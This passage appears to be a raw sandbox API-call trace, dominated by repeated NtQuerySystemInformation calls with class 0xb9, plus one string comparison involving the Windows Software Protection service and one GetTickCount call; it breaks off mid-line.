[0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2c0, Length=0x20, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f5d0, Length=0x58, ResultLength=0x0) [0243.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f540, Length=0x28, ResultLength=0x0) [0243.481] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0243.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f5d0, Length=0x58, ResultLength=0x0) [0243.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f5d0, Length=0x58, ResultLength=0x0) [0243.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f5d0, Length=0x58, ResultLength=0x0) [0243.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0243.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2f0, Length=0x28, ResultLength=0x0) [0243.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2f0, Length=0x28, ResultLength=0x0) [0243.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2f0, Length=0x28, ResultLength=0x0) [0243.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f360, Length=0x28, ResultLength=0x0) [0243.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0243.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0243.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3e0, Length=0x28, ResultLength=0x0) [0243.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3e0, Length=0x28, ResultLength=0x0) [0243.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0243.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0243.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f250, Length=0x20, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x20, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x20, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x20, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f420, Length=0x20, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f340, Length=0x20, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2c0, Length=0x20, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2c0, Length=0x20, ResultLength=0x0) [0243.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2c0, Length=0x20, ResultLength=0x0) [0243.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0243.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f340, Length=0x20, ResultLength=0x0) [0243.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2c0, Length=0x20, ResultLength=0x0) [0243.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2c0, Length=0x20, ResultLength=0x0) [0243.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2c0, Length=0x20, ResultLength=0x0) [0243.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x38, ResultLength=0x0) [0243.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f340, Length=0x20, ResultLength=0x0) [0243.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2d0, Length=0x20, ResultLength=0x0) [0243.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2d0, Length=0x20, ResultLength=0x0) [0243.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f5d0, Length=0x58, ResultLength=0x0) [0243.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f510, Length=0x20, ResultLength=0x0) [0243.495] GetTickCount () returned 0x117d592 [0243.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3c8, Length=0x58, ResultLength=0x0) [0243.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2e0, Length=0x38, ResultLength=0x0) [0243.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f110, Length=0x28, ResultLength=0x0) [0243.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f110, Length=0x28, ResultLength=0x0) [0243.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f110, Length=0x28, ResultLength=0x0) [0243.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f110, Length=0x28, ResultLength=0x0) [0243.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x28, ResultLength=0x0) [0243.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2e0, Length=0x38, ResultLength=0x0) [0243.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x28, ResultLength=0x0) [0243.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x28, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2e0, Length=0x38, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f160, Length=0x20, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0e0, Length=0x20, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0e0, Length=0x20, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0e0, Length=0x20, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2e0, Length=0x38, ResultLength=0x0) [0243.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f160, Length=0x20, ResultLength=0x0) [0243.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0f0, Length=0x20, ResultLength=0x0) [0243.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0f0, Length=0x20, ResultLength=0x0) [0243.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3c8, Length=0x58, ResultLength=0x0) [0243.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0243.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0e0, Length=0x28, ResultLength=0x0) [0243.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0e0, Length=0x28, ResultLength=0x0) [0243.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0e0, Length=0x28, ResultLength=0x0) [0243.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0e0, Length=0x28, ResultLength=0x0) [0243.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f150, Length=0x28, ResultLength=0x0) [0243.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0243.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0243.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x28, ResultLength=0x0) [0243.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x28, ResultLength=0x0) [0243.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0243.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0243.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f040, Length=0x20, ResultLength=0x0) [0243.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x20, ResultLength=0x0) [0243.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x20, ResultLength=0x0) [0243.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x20, ResultLength=0x0) [0243.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f210, Length=0x20, ResultLength=0x0) [0243.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0243.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x20, ResultLength=0x0) [0243.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x20, ResultLength=0x0) [0243.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x20, ResultLength=0x0) [0243.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x20, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x20, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x20, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x20, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0b0, Length=0x20, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0243.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, 